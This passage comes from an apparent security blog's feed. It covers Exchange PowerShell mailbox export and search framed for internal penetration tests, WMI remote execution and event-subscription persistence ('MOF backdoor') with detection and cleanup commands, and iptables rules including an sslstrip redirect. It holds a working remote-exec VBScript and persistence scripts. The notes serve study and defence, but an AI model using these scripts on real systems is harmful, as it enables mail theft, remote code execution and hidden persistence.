Files\Microsoft\Exchange Server\V15\bin</p><h4 id="执行自定义脚本"><a href="#执行自定义脚本" class="headerlink" title="Running a custom script"></a>Running a custom script</h4><p>Remote script execution must be enabled</p><p><code>Set-ExecutionPolicy RemoteSigned</code></p><p>Script</p><figure class="highlight powershell"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div></pre></td><td class="code"><pre><div class="line"><span class="comment"># filename:test.ps1</span></div><div class="line"><span class="comment"># export to pst</span></div><div class="line"><span class="keyword">foreach</span>(<span class="variable">$user</span> <span class="keyword">in</span> <span class="string">"admin"</span>,<span class="string">"user1"</span>,<span class="string">"user2"</span>){</div><div class="line"> New-MailboxExportRequest -Mailbox <span class="variable">$user</span> -ContentFilter { Received <span class="nomarkup">-gt</span> <span class="string">"11/29/2016"</span> } -FilePath <span class="string">"\\192.168.6.2\sharename<span class="variable">$\$</span>user.pst"</span></div><div class="line"> <span class="built_in">Start-Sleep</span> -Seconds <span class="number">3</span></div><div class="line">}</div></pre></td></tr></table></figure><p>Launching the script from cmd</p><blockquote><p>On 64-bit systems file system redirection applies; the PowerShell path is C:\windows\sysnative\WindowsPowerShell\v1.0\powershell.exe</p></blockquote><p><code>PowerShell.exe -command ". 'C:\Program Files\Microsoft\Exchange Server\V15\bin\RemoteExchange.ps1'; Connect-ExchangeServer -auto; C:\test.ps1"</code></p><p>or </p><p>View role permissions</p><p><code>PowerShell.exe -command ". 'C:\Program Files\Microsoft\Exchange Server\V15\bin\RemoteExchange.ps1'; Connect-ExchangeServer -auto; Get-ManagementRoleAssignment -role \"Mailbox Import Export\""</code></p><h2 id="邮件搜索-Search-Mailbox"><a href="#邮件搜索-Search-Mailbox" class="headerlink" title="Mail search with Search-Mailbox"></a>Mail search with Search-Mailbox</h2><p>Step 1: Add the user to the Organization Management group and assign the role</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div></pre></td><td class="code"><pre><div class="line">net group "Organization Management" admin /add /domain</div><div class="line">[PS] C:\>New-ManagementRoleAssignment -Role "Mailbox Import Export" -User admin</div><div class="line"># Add to the Discovery Management group</div><div class="line">[PS] C:\>Add-RoleGroupMember -Identity "Discovery Management" -Member admin</div></pre></td></tr></table></figure><p>Step 2: Create a discovery search mailbox<br><code>New-Mailbox -Name SearchResults -Discovery</code></p><p>Make the discovery mailbox visible in the address list<br><code>Set-Mailbox -Id SearchResults -HiddenFromAddressListsEnabled $false</code></p><p>View the discovery search mailboxes<br><code>Get-Mailbox -Resultsize unlimited -Filter {RecipientTypeDetails -eq "DiscoveryMailbox"}</code></p><p>Step 3: Grant user admin full access to the search mailbox<br><code>Add-MailboxPermission SearchResults -User admin -AccessRights FullAccess -InheritanceType all</code></p><p>Step 4: Search mail</p><p>Search for messages containing the keyword key1 or key2, received after 4 May 2018, excluding those from sender hr.</p><figure class="highlight powershell"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div></pre></td><td class="code"><pre><div class="line"><span class="comment"># 
查看结果</span></div><div class="line">[PS] C:\>Search-Mailbox -Identity <span class="string">"test"</span> -SearchQuery <span class="string">'(key1 OR key2) AND Received>05/04/2018 NOT From:hr@ruos.org'</span> -EstimateResultOnly</div><div class="line"></div><div class="line">[PS] C:\>Get-Mailbox -ResultSize Unlimited |</div><div class="line">Search-Mailbox -SearchQuery <span class="string">'(key1 OR key2) AND Received:05/01/2018..05/08/2018'</span> `</div><div class="line">-DoNotIncludeArchive `</div><div class="line">-TargetMailbox <span class="string">"SearchResults"</span> `</div><div class="line">-TargetFolder <span class="string">"Results"</span> `</div><div class="line">-LogLevel Suppress</div></pre></td></tr></table></figure><p>在test邮箱中打开搜索邮箱</p><p><img src="https://i.imgur.com/fv4mOuF.png" alt=""></p><h2 id="结束语"><a href="#结束语" class="headerlink" title="结束语"></a>结束语</h2><p>Exchange和AD的紧密性使得很多Cmdlet Reference都能达到同样的目的,比如查询用户登陆的源IP地址,我们还能通过Exchange的IIS日志来查找。但有时候遗憾的是,用户虽然在使用邮箱,工作机却没有加入域中。这种情况我们就需要配合其他信息进一步确认。</p><p><img src="http://i.imgur.com/f0rIlU4.png" alt=""></p><p>参考资料</p><p><a href="https://technet.microsoft.com/zh-cn/library/mt587043(v=exchg.150).aspx" target="_blank" rel="external">https://technet.microsoft.com/zh-cn/library/mt587043(v=exchg.150).aspx</a><br><a href="https://technet.microsoft.com/zh-cn/library/bb124558(v=exchg.150).aspx" target="_blank" rel="external">https://technet.microsoft.com/zh-cn/library/bb124558(v=exchg.150).aspx</a><br><a href="https://msdn.microsoft.com/en-us/library/hh770397(v=exchsrvcs.149).aspx" target="_blank" rel="external">https://msdn.microsoft.com/en-us/library/hh770397(v=exchsrvcs.149).aspx</a><br>Microsoft Exchange Server 2013 PowerShell Cookbook</p><p><a href="http://blog.51cto.com/msftuc/1660885" target="_blank" rel="external">http://blog.51cto.com/msftuc/1660885</a></p>]]></content>
<summary type="html">
<p><img src="https://i-technet.sec.s-msft.com/Areas/Epx/Themes/TechNet/Content/Images/BrandLogoExchange.png?v=636437933426396895" alt=""></p>
<blockquote>
<p>Microsoft Exchange Server is a messaging and collaboration system. It offers industry-leading scalability, high reliability, security and throughput, and is used as the primary mail system by many enterprises, schools and government bodies. In an internal penetration test, control of the mail system gets you twice the result for half the effort, especially with Exchange tied to AD.</p>
</blockquote>
<p>This article covers the basic operations on Exchange mail from PowerShell; they apply equally to operations management, though they are far from covering the vast EMS. The environment below is Exchange Server 2013, and the same applies to versions such as 2010.</p>
<p>You can connect to the Exchange server through the Exchange Management Shell (EMS) shortcut in the Start menu; after initialization you get a PowerShell command window. If the connection fails, trust me, you have not allocated enough memory: even a default Exchange installation needs at least 6 GB.</p>
<p>If everything is fine and you already have domain controller privileges, let's begin our journey!</p>
</summary>
</entry>
<entry>
<title>WMI</title>
<link href="http://ruos.org/2017/02/08/WMI/"/>
<id>http://ruos.org/2017/02/08/WMI/</id>
<published>2017-02-08T04:36:12.000Z</published>
<updated>2017-11-06T02:07:10.798Z</updated>
<content type="html"><![CDATA[<h3 id="WMI-管理规范"><a href="#WMI-管理规范" class="headerlink" title="WMI Management Specification"></a>WMI Management Specification</h3><p>Terminology</p><ul><li>CIM - Common Information Model – this is the premier concept of WBEM; through this model WMI stores the managed objects' data (namespaces, classes, methods, properties etc.).</li><li>CIM Repository – This is the storage that holds the managed objects' data. The structure of the CIM repository is built upon the DMTF standards.</li><li>CIMOM - Common Information Model Object Manager. The CIM repository is managed by the CIMOM, which acts as an agent for object requests. The CIMOM tracks available classes and determines which provider is responsible for supplying instances of these classes.</li><li>DMTF - Distributed Management Task Force – The DMTF consortium was founded in May 1992. This initiative was conceived and created by eight companies, including BMC Software Inc., Cisco Systems Inc., Compaq Computer Corp., Intel Corp. and Microsoft Corp. The aim of this consortium is to define industry standards for management.</li><li>MIB – Management Information Base; describes a set of managed objects. Each managed object in a MIB has a unique identifier.</li><li>MOF - Managed Object Format. This text file includes the class definitions of one or more managed objects. You can export and import these definitions from the CIM repository by using WMI CIM Studio.</li><li>Schema - a group of classes that describe a particular management environment.</li><li>SNMP - Simple Network Management Protocol. SNMP is an Internet standard defined by the IETF and is part of the TCP/IP suite of protocols. SNMP is the protocol by which management information travels between stations and agents. Management information refers to a collection of managed objects that reside in a virtual information store called a Management Information Base (MIB).</li><li>WBEM - Web-Based Enterprise Management – WBEM stands for several DMTF industry standards including the Common Information Model. WBEM provides a standardized way to access information from various hardware and software management systems in an enterprise environment.</li></ul><p>Protocols</p><p>DCOM: TCP port 135<br>WinRM: TCP ports 5985 (HTTP) and 5986 (HTTPS).<br>Service: Winmgmt</p><a id="more"></a><h3 id="测试工具"><a href="#测试工具" class="headerlink" title="Testing tools"></a>Testing tools</h3><ul><li>wmic.exe</li><li>wbemtest.exe</li><li>winrm.exe</li><li>CIM Studio</li><li>Powershell</li></ul><p>WMIC</p><p>List processes<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">wmic process list brief</div></pre></td></tr></table></figure></p><p>Create a process<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line">wmic process call create "notepad.exe"</div><div class="line">wmic /node:"hostname" /user:"domain\administrator" /password:"123456" process get name,processid</div></pre></td></tr></table></figure></p><p>Terminate a process<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">wmic process where name="qq.exe" call terminate</div></pre></td></tr></table></figure></p><p>Start a service<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">wmic SERVICE where name="tlntsvr" call startservice</div></pre></td></tr></table></figure></p><p>Scheduled jobs<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">wmic job</div></pre></td></tr></table></figure></p><p>Powershell<br><figure class="highlight powershell"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line"><span class="built_in">Get-WmiObject</span> -Namespace root\SecurityCenter2 -Class AntiVirusProduct</div></pre></td></tr></table></figure></p><p>// -Credential takes a previously created logon credential<br><figure class="highlight powershell"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line"><span class="built_in">Invoke-WmiMethod</span> -Class Win32_Process -Name Create -ArgumentList <span class="string">'notepad.exe'</span> -ComputerName <span class="number">192.168</span>.<span class="number">6.2</span> -Credential domain\administrator</div></pre></td></tr></table></figure></p><p>WQL<br><figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div></pre></td><td class="code"><pre><div class="line"><span class="keyword">SELECT</span> * <span class="keyword">FROM</span> Win32_ComputerSystem <span class="keyword">WHERE</span> NumberOfLogicalProcessors < <span class="number">2</span> </div><div class="line"><span class="keyword">SELECT</span> * <span class="keyword">FROM</span> __InstanceCreationEvent <span class="keyword">WITHIN</span> <span class="number">15</span> <span class="keyword">WHERE</span> TargetInstance ISA <span class="string">'Win32_LogonSession'</span> <span class="keyword">AND</span> TargetInstance.LogonType = <span class="number">2</span> </div><div class="line"><span class="keyword">SELECT</span> * <span class="keyword">FROM</span> Win32_VolumeChangeEvent <span class="keyword">WHERE</span> EventType = <span class="number">2</span></div></pre></td></tr></table></figure></p><h3 id="WSH"><a href="#WSH" class="headerlink" title="WSH"></a>WSH</h3><p>REMOTE COMMAND EXEC</p><blockquote><p>Sometimes a low-privileged user cannot initialize the wmic command-line utility, but VBScript can still access the WMI interface.</p></blockquote><figure class="highlight vbs"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div><div class="line">28</div></pre></td><td class="code"><pre><div class="line"><span class="comment">'VBS</span></div><div class="line"><span class="comment">' remote command exec</span></div><div class="line"><span class="comment">' cscript wmiexec.vbs 192.168.6.2 domain\administrator 123456 "cmd.exe /c net user > c:\11.txt"</span></div><div class="line"><span class="keyword">On</span> <span class="keyword">Error</span> <span class="keyword">GoTo</span> <span class="number">0</span></div><div class="line"><span class="keyword">Dim</span> strComputer</div><div class="line"><span class="keyword">Dim</span> strUser</div><div class="line"><span class="keyword">Dim</span> strPassword</div><div class="line"><span class="keyword">Dim</span> strCommand</div><div class="line"><span class="keyword">Set</span> objArgs = WScript.Arguments</div><div class="line">strComputer = objArgs(<span class="number">0</span>)</div><div class="line">strUser = objArgs(<span class="number">1</span>)</div><div class="line">strPassword = objArgs(<span class="number">2</span>)</div><div class="line">strCommand = objArgs(<span class="number">3</span>)</div><div class="line"><span class="keyword">Set</span> objWMIService = <span class="built_in">CreateObject</span>(<span class="string">"WbemScripting.SWbemLocator"</span>).ConnectServer(strComputer,<span class="string">"root/cimv2"</span>,strUser,strPassword)</div><div class="line"><span class="comment">' Create process</span></div><div class="line"><span class="keyword">Set</span> process = objWMIService.<span class="keyword">Get</span>(<span class="string">"Win32_Process"</span>)</div><div class="line">intReturn = process.Create(strCommand)</div><div class="line"><span class="keyword">If</span> intReturn <><span class="number">0</span> <span class="keyword">then</span></div><div class="line">WScript.Echo <span class="string">"Return value: "</span> & intReturn</div><div class="line">WScript.Echo <span class="string">"Access denied (2)"</span> &vbLf & _</div><div class="line"><span class="string">"Insufficient privilege (3)"</span> &vbLf & _</div><div class="line"><span class="string">"Unknown failure (8)"</span> &vbLf & _</div><div class="line"><span class="string">"Path not found (9)"</span> &vbLf & _</div><div class="line"><span class="string">"Invalid parameter (21)"</span> &vbLf & _</div><div class="line"><span class="string">"Other (22-4294967295)"</span></div><div class="line"><span class="keyword">Else</span></div><div class="line">Wscript.Echo <span class="string">"Process created."</span></div><div class="line"><span class="keyword">End</span> <span class="keyword">If</span></div></pre></td></tr></table></figure><h3 id="MOF-后门"><a href="#MOF-后门" class="headerlink" title="MOF backdoor"></a>MOF backdoor</h3><blockquote><p>Managed Object Format (MOF) is the original storage form of classes and class instances in the WMI database.</p></blockquote><p>Dynamically creating a WMI class</p><figure class="highlight powershell"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div></pre></td><td class="code"><pre><div class="line"><span class="variable">$StaticClass</span> = <span class="built_in">New-Object</span> Management.ManagementClass(<span class="string">'root\cimv2'</span>,<span class="literal">$null</span>,<span class="literal">$null</span>)</div><div class="line"><span class="variable">$StaticClass</span>.Name = <span class="string">'Win32_EvilClass'</span></div><div class="line"><span class="variable">$StaticClass</span>.Put()</div><div class="line"><span class="variable">$StaticClass</span>.Properties.Add(<span class="string">'EvilProperty'</span>,<span class="string">"This is not the malware you're looking for"</span>)</div><div class="line"><span class="variable">$StaticClass</span>.Put()</div></pre></td></tr></table></figure><p>Creating a permanent event subscription</p><ol><li>Event Filters: select the events of interest</li><li><p>Event Consumers: the action to perform when the event fires</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div></pre></td><td class="code"><pre><div class="line"> __EventConsumer </div><div class="line">LogFileEventConsumer - writes the event data to a specified log file</div><div class="line">ActiveScriptEventConsumer - runs an embedded VBScript or JScript script</div><div class="line">NTEventLogEventConsumer - creates an event log entry containing the event data</div><div class="line">SMTPEventConsumer - sends an e-mail containing the event data</div><div class="line">CommandLineEventConsumer - runs a command-line program</div></pre></td></tr></table></figure></li><li><p>Binding: binds the filter to the consumer<br> __FilterToConsumerBinding</p></li></ol><p>Event types</p><p>Intrinsic events<br>Intrinsic events represent the creation, modification and deletion of any WMI class, object or namespace. Their names usually begin with two underscores. Events can be missed, so the polling interval must be given in the WITHIN clause of the WQL query.<br>__InstanceCreationEvent </p><p>Extrinsic events<br>WMI has fewer extrinsic events; they fire immediately when the event occurs.<br>ROOT\CIMV2:Win32_OperatingSystem </p><blockquote><p>Using the extrinsic Win32_ProcessStartTrace event as a trigger on the creation of LogonUI.exe, a specific script or program can be run whenever a user logs on.</p></blockquote><p>test.mof</p><p><a href="https://www.codeproject.com/articles/27914/wmi-mof-basics" target="_blank" rel="external">https://www.codeproject.com/articles/27914/wmi-mof-basics</a></p><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div></pre></td><td class="code"><pre><div class="line">#PRAGMA NAMESPACE ("\\\\.\\root\\subscription")</div><div class="line"></div><div class="line">instance of CommandLineEventConsumer as $Consumer</div><div class="line">{</div><div class="line"> Name = "WMI_Mofbackdoor_Test_CL";</div><div class="line"> RunInteractively=false;</div><div class="line"> CommandLineTemplate="calc.exe";</div><div class="line">};</div><div class="line"></div><div class="line">instance of __EventFilter as $EventFilter</div><div class="line">{</div><div class="line"> Name = "WMI_Mofbackdoor_Test_EF";</div><div class="line"> EventNamespace = "Root\\Cimv2";</div><div class="line"> Query ="SELECT * FROM __InstanceCreationEvent Within 5 Where TargetInstance Isa \"Win32_Process\" And Targetinstance.Name = \"notepad.exe\" ";</div><div class="line"> QueryLanguage = "WQL";</div><div class="line">};</div><div class="line"></div><div class="line">instance of __FilterToConsumerBinding {</div><div class="line"> Filter = $EventFilter;</div><div class="line"> Consumer = $Consumer;</div><div class="line">};</div></pre></td></tr></table></figure><p>Compiling<br><code>mofcomp.exe -autorecover test.mof</code></p><p><code>mofcomp -N://[machinename]/root/subscription test.mof</code></p><p>Or<br>drop the file into the %SystemRoot%\System32\Wbem\MOF folder, where it is compiled and executed automatically.</p><p>PowerShell</p><p>• Get-WmiObject<br>• Get-CimAssociatedInstance<br>• Get-CimClass - Powershell 3.0 CmdLet<br>• Get-CimInstance<br>• Get-CimSession<br>• Set-WmiInstance<br>• Set-CimInstance<br>• Invoke-WmiMethod<br>• Invoke-CimMethod<br>• New-CimInstance<br>• New-CimSession<br>• New-CimSessionOption<br>• Register-CimIndicationEvent<br>• Register-WmiEvent<br>• Remove-CimInstance<br>• Remove-WmiObject<br>• Remove-CimSession </p><p>Creating a boot-time startup event</p><figure class="highlight powershell"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div></pre></td><td class="code"><pre><div class="line"><span class="variable">$filterName</span>=<span class="string">'BotFilter82'</span></div><div class="line"><span class="variable">$consumerName</span>=<span class="string">'BotConsumer23'</span></div><div class="line"><span class="variable">$exePath</span>=<span class="string">'C:\MyProg.exe'</span></div><div class="line"><span class="comment"># create an __EventFilter</span></div><div class="line"><span class="variable">$Query</span>=<span class="string">"SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 200 AND TargetInstance.SystemUpTime < 320"</span></div><div class="line"><span class="variable">$WMIEventFilter</span>=<span class="built_in">Set-WmiInstance</span> -Class __EventFilter -NameSpace <span class="string">"root\subscription"</span> -Arguments @{</div><div class="line">Name=<span class="variable">$filterName</span>;</div><div class="line">EventNameSpace=<span class="string">"root\cimv2"</span>;</div><div class="line">QueryLanguage=<span class="string">"WQL"</span>;</div><div class="line">Query=<span class="variable">$Query</span>} -ErrorAction Stop</div><div class="line"><span class="comment"># create a CommandLineEventConsumer</span></div><div class="line"><span class="variable">$WMIEventConsumer</span>=<span class="built_in">Set-WmiInstance</span> -Class CommandLineEventConsumer -Namespace <span class="string">"root\subscription"</span> -Arguments @{</div><div class="line">Name=<span class="variable">$consumerName</span>;</div><div class="line">ExecutablePath=<span class="variable">$exePath</span>;</div><div class="line">CommandLineTemplate=<span class="variable">$exePath</span>}</div><div class="line"><span class="comment"># bind the filter to the consumer</span></div><div class="line"><span class="built_in">Set-WmiInstance</span> -Class __FilterToConsumerBinding -Namespace <span class="string">"root\subscription"</span> -Arguments @{</div><div class="line"><span class="keyword">Filter</span>=<span class="variable">$WMIEventFilter</span>;</div><div class="line">Consumer=<span class="variable">$WMIEventConsumer</span></div><div class="line">}</div></pre></td></tr></table></figure><h3 id="检测"><a href="#检测" class="headerlink" title="Detection"></a>Detection</h3><blockquote><p>WMI is sometimes used by malware to change the browser home page.</p></blockquote><p>Listing filters, consumers and bindings</p><p>PowerShell<br><figure class="highlight powershell"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div></pre></td><td class="code"><pre><div class="line"><span class="comment">#List Event Filters</span></div><div class="line"><span class="built_in">Get-WMIObject</span> -Namespace root\Subscription -Class __EventFilter</div><div class="line"><span class="comment">#List Event Consumers</span></div><div class="line"><span class="built_in">Get-WMIObject</span> -Namespace root\Subscription -Class __EventConsumer</div><div class="line"><span class="comment">#List Event Bindings</span></div><div class="line"><span class="built_in">Get-WMIObject</span> -Namespace root\Subscription -Class __FilterToConsumerBinding</div></pre></td></tr></table></figure></p><p>Using wmic</p><p><code>wmic /namespace:\\root\subscription PATH __EventConsumer get /format:list</code><br><code>wmic /namespace:\\root\subscription PATH __EventFilter get /format:list</code><br><code>wmic /namespace:\\root\subscription PATH __FilterToConsumerBinding get /format:list</code><br><code>wmic /namespace:\\root\subscription PATH __TimerInstruction get /format:list</code></p><p>Cleanup</p><p>Powershell<br><figure class="highlight powershell"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div></pre></td><td class="code"><pre><div class="line"><span class="built_in">Get-WMIObject</span> -Namespace root\Subscription -Class __EventFilter -Filter <span class="string">"Name='filtP1'"</span> | <span class="built_in">Remove-WmiObject</span> -Verbose </div><div class="line"><span class="built_in">Get-WmiObject</span> -Namespace root\Subscription -Class __EventConsumer</div><div class="line"><span class="built_in">Get-WMIObject</span> -Namespace root\Subscription -Class CommandLineEventConsumer -Filter <span class="string">"Name='consP1'"</span> | <span class="built_in">Remove-WmiObject</span> -Verbose </div><div class="line"><span class="built_in">Get-WMIObject</span> -Namespace root\Subscription -Class __FilterToConsumerBinding -Filter <span class="string">"__Path LIKE '%BotFilter82%'"</span> | <span class="built_in">Remove-WmiObject</span> -Verbose</div></pre></td></tr></table></figure></p><p>Using wmic</p><p><code>wmic /namespace:\\root\subscription PATH __EventConsumer delete</code><br><code>wmic /namespace:\\root\subscription PATH __EventFilter delete</code><br><code>wmic /namespace:\\root\subscription PATH __FilterToConsumerBinding delete</code><br><code>wmic /namespace:\\root\subscription PATH __TimerInstruction delete</code></p><h3 id="WMI-Providers"><a href="#WMI-Providers" class="headerlink" title="WMI Providers"></a>WMI Providers</h3><p><a href="https://www.codeproject.com/articles/5206/a-simple-guide-to-wmi-providers" target="_blank" rel="external">https://www.codeproject.com/articles/5206/a-simple-guide-to-wmi-providers</a></p><p>Installing a provider<br><code>Installutil.exe WMIServiceHost.dll</code></p><p><code>wmic PATH win32_servicehost</code></p><p>Error handling</p><p>Registering the DLL<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">regasm "%systemdrive%\program files\reference assemblies\microsoft\framework\v3.5\system.management.instrumentation.dll"</div></pre></td></tr></table></figure></p><h3 id="架构"><a href="#架构" class="headerlink" title="Architecture"></a>Architecture</h3><p>namespaces, classes, and objects</p><p>Persistent objects are stored in the CIM repository at %SystemRoot%\System32\wbem\Repository\, which holds WMI class instances, class definitions and namespace definitions.</p><blockquote><p>Note<br>1. The CIM repository can store arbitrary data<br>2. It can serve as a C2 channel for transferring data<br>3. Providers can be created</p></blockquote>]]></content>
<summary type="html">
<h3 id="WMI-管理规范"><a href="#WMI-管理规范" class="headerlink" title="WMI Management Specification"></a>WMI Management Specification</h3><p>Terminology</p>
<ul>
<li>CIM - Common Information Model – this is the premier concept of WBEM by this model WMI stores the Managed objects data (namespace, classes, methods, properties etc.). </li>
<li>CIM Repository – This is the storage that holds the managed objects' data. The structure of the CIM repository is built upon the DMTF standards.</li>
<li>CIMOM - Common Information Model Object Manager. The CIM repository is managed by the CIMOM, which acts as an agent for object requests. The CIMOM tracks available classes and determines which provider is responsible for supplying instances of these classes.</li>
<li>DMTF - Distributed Management Task Force – The DMTF consortium was founded in May of 1992. This initiative was conceived and created by eight companies like: BMC Software Inc., Cisco Systems Inc., Compaq Computer Corp., Intel Corp., and Microsoft Corp. etc. The aims of this consortium are to define industry standards for management.</li>
<li>MIB – Management Information Base describes a set of managed objects. Each managed object in a MIB has a unique identifier.</li>
<li>MOF - Managed Object Format. This text file includes the class definitions of one or more managed objects. You can export and import these definitions from the CIM repository by using WMI CIM Studio.</li>
<li>Schema - a group of classes that describe a particular management environment.</li>
<li>SNMP - Simple Network Management Protocol. SNMP is an Internet standard defined by the IETF and is part of the TCP/IP suite of protocols. SNMP is the protocol by which management information travels between stations and agents. Management information refers to a collection of managed objects that reside in a virtual information store called a Management Information Base (MIB).</li>
<li>WBEM - Web-Based Enterprise Management – WBEM stands for several DMTF industry standards including the Common Information Model. WBEM provides a standardized way to access information from various hardware and software management systems in an enterprise environment. </li>
</ul>
<p>Protocols</p>
<p>DCOM: TCP port 135<br>WinRM: TCP ports 5985 (HTTP) and 5986 (HTTPS).<br>Service: Winmgmt</p>
</summary>
</entry>
<entry>
<title>Iptables</title>
<link href="http://ruos.org/2016/09/19/Iptables/"/>
<id>http://ruos.org/2016/09/19/Iptables/</id>
<published>2016-09-19T08:55:06.000Z</published>
<updated>2018-02-27T08:14:50.020Z</updated>
<content type="html"><![CDATA[<p>Chains</p><ol><li>PREROUTING (before the routing decision)</li><li>INPUT (packets addressed to this host)</li><li>FORWARD (packets routed through this host)</li><li>OUTPUT (packets generated by this host)</li><li>POSTROUTING (after the routing decision)</li></ol><p><img src="https://i.imgur.com/CAjJ7Y1.gif" alt=""></p><a id="more"></a>
<p>List the rules (this is the rule list, not the routing table; <code>-n</code> skips name resolution, <code>--line-numbers</code> prints the positions that <code>-D</code>, <code>-I</code> and <code>-R</code> below refer to)<br><figure class="highlight plain"><table><tr><td class="code"><pre><div class="line">iptables -L -n -v</div><div class="line">iptables -L -n --line-numbers</div><div class="line">iptables -t nat -vnL</div></pre></td></tr></table></figure></p>
<p>Set the default policy of a chain<br><code>iptables -P INPUT (DROP|ACCEPT)</code> deny by default / allow by default. On a remote machine add the ESTABLISHED and ssh rules first and switch the policy to DROP last, otherwise the session you are typing in is cut off.</p>
<p>Flush chains<br><figure class="highlight plain"><table><tr><td class="code"><pre><div class="line">iptables -t nat -F             # flush every chain of the nat table</div><div class="line">iptables -t nat -F PREROUTING  # flush one chain</div><div class="line">iptables -F                    # filter table only; -F does not reset policies, so with policy DROP this leaves everything blocked</div></pre></td></tr></table></figure></p>
<p>Create a chain<br><code>iptables -N NEWCHAINNAME</code></p>
<p>Match options<br>-s: source address, given as IP, IP/MASK or 0.0.0.0/0.0.0.0 rather than a hostname (a hostname is resolved once, when the rule is inserted)<br>Prefix it with "!" to negate: everything except that address<br>-d: destination address<br>-p: protocol (usually one of tcp, udp or icmp)<br>-i eth0: packets arriving on this interface; meaningful in INPUT, FORWARD and PREROUTING<br>-o eth0: packets leaving on this interface; meaningful in OUTPUT, FORWARD and POSTROUTING</p>
<p>--dport 22 destination port<br>--sport 22 source port<br>-p tcp the protocol; required before --dport/--sport<br>-j ACTION: DROP / REJECT / ACCEPT / DNAT (rewrite the destination) / SNAT (rewrite the source) / MASQUERADE / REDIRECT</p>
<p>Allow only 192.168.6.1 to reach the local ssh service<br><code>iptables -t filter -A INPUT -s 192.168.6.1 -p tcp --dport 22 -j ACCEPT</code></p>
<p>Drop port 22 traffic from every address other than 192.168.6.1<br><code>iptables -A INPUT ! -s 192.168.6.1 -p tcp --dport 22 -j DROP</code></p>
<p>Delete rule 4 of INPUT (delete)<br><code>iptables -D INPUT 4</code></p>
<p>Delete rule 1 of FORWARD<br><code>iptables -D FORWARD 1</code></p>
<p>Connection state: accept only NEW and ESTABLISHED inbound and only ESTABLISHED outbound. A reverse-connect trojan has to open a NEW outbound connection to call home, so this egress rule is a good control for that common case.</p>
<p>NAT<br><code>iptables -t nat -A POSTROUTING -s 192.168.10.0/24 -j MASQUERADE</code></p>
<p>Behind the NAT, send traffic for 192.168.10.18 port 80 on to 172.16.100.2<br><code>iptables -t nat -A PREROUTING -d 192.168.10.18 -p tcp --dport 80 -j DNAT --to-destination 172.16.100.2</code></p>
<p>Redirect port 80 to a local port (for example the port sslstrip listens on)<br><code>iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port &lt;sslstrip listenPort&gt;</code></p>
<p>DNAT port mapping (<code>--to</code> is short for <code>--to-destination</code>)<br><code>iptables -t nat -A PREROUTING -d &lt;public IP&gt; -p TCP --dport 80 -j DNAT --to-destination 10.31.2.1</code><br><code>iptables -t nat -A PREROUTING -i eth1 -p udp --dport 53 -j DNAT --to 192.168.6.1</code></p>
<p>Delete a nat PREROUTING rule by number<br><code>iptables -t nat -D PREROUTING &lt;num&gt;</code></p>
<p>Insert as rule 3 of INPUT (insert; the old rule 3 becomes rule 4)<br><code>iptables -I INPUT 3 -p tcp --dport 21 -j ACCEPT</code></p>
<p>Replace rule 3 (the replacement is a complete rule; this one has no match and so drops everything that reaches it)<br><code>iptables -R INPUT 3 -j DROP</code></p>
<p>Catch-all at the end of the chain<br><code>iptables -A INPUT -j ACCEPT</code></p>
